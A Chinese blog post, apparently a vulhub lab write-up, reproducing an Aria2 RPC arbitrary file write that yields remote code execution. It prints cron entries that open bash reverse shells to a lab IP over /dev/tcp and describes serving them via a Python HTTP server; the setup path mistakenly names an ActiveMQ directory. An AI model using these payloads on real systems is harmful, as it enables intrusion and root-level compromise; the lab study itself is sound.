美文网首页vulhub
Aria2 任意文件写入漏洞

Aria2 任意文件写入漏洞

作者: 3mi1e | 来源:发表于2019-07-22 20:40 被阅读277次

Aria2 任意文件写入漏洞

1.漏洞影响版本

没有查到,按照vulhub部署的版本,认为是Aria2<1.18.8

2.漏洞危害

任意文件上传,导致RCE(远程命令执行)

3.漏洞POC
部署虚拟机
cd /rootcd /vulhub/activemq/CVE-2016-3088           ////进入本次复现的vulhub目录
docker-compose up -d                                ////docker-compose搭建环境
下载完成

因为rpc通信需要使用json或者xml,不太方便,所以我们可以借助第三方UI来和目标通信,如 Yet Another Aria2 Web Frontend
通信地址:http://192.168.11.129:6800/jsonrpc

设置通信地址

第一种/etc/crontab为bash

通过写入一个crond任务来反弹shell
shell内容,注意使用linux生成:

*/1 * * * * root bash -i >& /dev/tcp/192.168.11.1/4444 0>&1

上传的文件使用命令查看内容,文件末尾要有\n:

od -c -t x2 shell
od查看

使用python搭建http服务:

python -m SimpleHTTPServer 80
上传shell getshell

第二种/etc/crontab中的shell为sh

sh

使用linux生成需要上传的shell为:

*/1 * * * * root echo "#!/bin/bash" > /etc/cron.d/crontabshell
*/1 * * * * root echo "bash -i >& /dev/tcp/192.168.11.1/7777 0>&1" >> /etc/cron.d/crontabshell
*/1 * * * * root chmod +x /etc/cron.d/crontabshell
*/1 * * * * root /etc/cron.d/crontabshell
getshell
4.复盘

最开心的一次漏洞复现
漏洞复现原因
使用RPC接口来操作aria2来下载文件,将文件下载至任意目录,造成一个任意文件写入漏洞。
复习巩固
1./etc/cron.d反弹shell
2.od查看隐藏字符
3.python搭建简易http

相关文章

网友评论

    本文标题:Aria2 任意文件写入漏洞

    本文链接:https://www.haomeiwen.com/subject/xesglctx.html